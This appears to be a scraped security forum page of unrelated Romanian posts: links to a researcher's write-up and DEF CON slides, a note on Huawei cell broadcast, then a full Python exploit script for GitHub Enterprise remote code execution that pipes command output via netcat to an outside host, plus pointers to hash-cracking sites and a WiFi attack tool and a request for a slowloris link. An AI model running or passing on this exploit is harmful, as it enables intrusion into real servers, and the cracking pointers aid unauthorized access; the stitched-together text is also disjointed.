Leaderboard

Aveti aici si articolul aferent exploitului, cu detalii pentru cei interesati: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html

:))))))))) fugi ma de aici

Microsoft a pus din ce in ce mai mult focus-ul pe securitate, iar vulnerabilitatile descoperite sunt din ce in ce mai putine si din ce in ce mai greu de exploatat.

Daca aveti putin mai mult timp liber, aruncati un ochi peste asta. E prea lung sa-i dau copy paste aici. Good read.

PDF-urile pentru prezentarile de la Blackhat 2017: https://media.defcon.org/DEF CON 25/DEF CON 25 presentations/

Pare o aplicatie ce iti permite sa configurezi mesajele pe care le poti primi de la operator in caz de alerte. Spre exemplu, in caz de cutremur, se trimite un mesaj (nu SMS) catre toti utilizatorii din zona respectiva. Citeste https://en.wikipedia.org/wiki/Cell_Broadcast Mai poti cauta informatii despre service messages. Daca vrei sa scapi de ea (nu vad de ce), fiind aplicatie proprietara Huawei si inglobata deja in Android-ul lor, nu te ajuta factory reset. Flash-uieste un custom ROM.

#!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "`id | nc orange.tw 12345`" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" ''' marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' payload = [ '', 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), marshal_code, '', '' ] payload = map(quote, payload) url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/' print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org" print '-'*10 + '\n' print url + '%0D%0A'.join(payload) print ''' Inserting WebHooks from: https://ghe-server/:user/:repo/settings/hooks Triggering RCE from: https://ghe-server/search?q=ggggg&type=Repositories ''' Sursa: https://www.exploit-db.com/exploits/42392/.

For a good password use this sites https://hashc.co.uk/ https://gpuhash.me/ onlinehashcrack.com If you are a beginner try this Dumpper v.90.x google it i think you will find it on git or here https://sourceforge.net/projects/dumpper/

Mozhete li vy dat' mne novuyu ssylku qslowloris